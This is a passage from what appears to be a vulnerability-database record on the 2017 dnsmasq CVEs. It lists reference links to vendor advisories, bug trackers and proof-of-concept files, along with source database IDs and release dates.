url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495510 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14494 | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14496.py | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495409 bug 1495409 | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/973527 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495410 | Trust: 0.3 |
url: | https://www.debian.org/security/2017/dsa-3989 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-13704 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14492 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495416 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14496 | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495415 | Trust: 0.3 |
url: | http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.601472 | Trust: 0.3 |
url: | https://access.redhat.com/security/cve/cve-2017-14493 | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14493.py | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14491.py | Trust: 0.3 |
url: | http://www.thekelleys.org.uk/dnsmasq/doc.html | Trust: 0.3 |
url: | https://bugzilla.redhat.com/show_bug.cgi?id=1495412 | Trust: 0.3 |
url: | https://access.redhat.com/errata/rhsa-2017:2837 | Trust: 0.3 |
url: | http://www.thekelleys.org.uk/dnsmasq/changelog | Trust: 0.3 |
url: | https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14495.py | Trust: 0.3 |
url: | https://github.com/kubernetes/kubernetes/blob/master/changelog.md | Trust: 0.3 |
SOURCES
db: | BID | id: | 101085 |
db: | PACKETSTORM | id: | 144468 |
db: | PACKETSTORM | id: | 144473 |
db: | PACKETSTORM | id: | 144462 |
db: | PACKETSTORM | id: | 144471 |
db: | PACKETSTORM | id: | 144480 |
db: | PACKETSTORM | id: | 144479 |
db: | EXPLOIT-DB | id: | 42943 |
db: | EDBNET | id: | 94397 |
db: | EDBNET | id: | 94654 |
db: | EDBNET | id: | 94657 |
db: | EDBNET | id: | 94656 |
db: | EDBNET | id: | 94655 |
db: | EDBNET | id: | 94653 |
LAST UPDATE DATE
2024-03-21T15:11:50.005000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 101085 | date: | 2017-10-02T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 101085 | date: | 2017-10-02T00:00:00 |
db: | PACKETSTORM | id: | 144468 | date: | 2017-10-02T05:22:22 |
db: | PACKETSTORM | id: | 144473 | date: | 2017-10-02T10:01:11 |
db: | PACKETSTORM | id: | 144462 | date: | 2017-10-02T03:33:33 |
db: | PACKETSTORM | id: | 144471 | date: | 2017-10-02T08:32:22 |
db: | PACKETSTORM | id: | 144480 | date: | 2017-10-02T16:22:22 |
db: | PACKETSTORM | id: | 144479 | date: | 2017-10-02T14:44:44 |
db: | EXPLOIT-DB | id: | 42943 | date: | 2017-10-02T00:00:00 |
db: | EDBNET | id: | 94397 | date: | 2017-10-02T00:00:00 |
db: | EDBNET | id: | 94654 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94657 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94656 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94655 | date: | 2017-10-13T00:00:00 |
db: | EDBNET | id: | 94653 | date: | 2017-10-13T00:00:00 |